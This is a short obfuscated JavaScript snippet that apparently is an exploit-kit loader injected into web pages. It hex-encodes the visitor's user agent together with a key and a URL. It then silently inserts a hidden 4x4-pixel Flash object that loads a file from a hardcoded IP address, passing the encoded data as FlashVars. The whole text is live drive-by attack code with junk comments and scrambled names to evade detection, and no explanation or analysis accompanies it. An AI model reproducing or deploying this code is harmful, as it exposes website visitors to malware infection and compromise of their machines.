/*s55103d43935hssfj8819fs*/function hgfgerdfgdf(num, width){/*s43934d22402hfj44634fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s82176d92591hfj52288fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s65789d51066hfj2156fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s66858d91012hfj85707fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd62421hfs*/c += b + d;/*s34476d80449hfj54274fs*/e += 1;}return c;}/*s10973dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.33.165/?NDM4OTQ1&man=LojBDTKgRkzoxcA14T9aim3ECBzhKd0cGE_BWNNAsR-ZWUEuVo2l_xzbMkccklxRKB61ETi-hL&pan=xX_QMvWdbRXQCJ3EKvncT6NEMVHRHECL2YydmrHTefjaeVWkzrLFTF_xozKASwSG6_JtdfJRDQ&shop=MzMwNjk4MzY=", ghnvbn("http://188.225.33.165/?MzI3NTk3&man=glY8IAVhC8qj8jECEzRScgZaKrxfZZghBrpPDErA72F-gm7ASd8khkxfR62BUzugtWlgZ4wgRna_7S6CJrg&pan=xH_QMrDYbR3FFYPfKPrEUKdEMU7WA0eKwYyZhazVF5yxFDfGpbL1Fx_spVydCF-EmvFvdLAHIwGh1UTASwR&gift=MTc5MzExOTY=","wexykukusw"));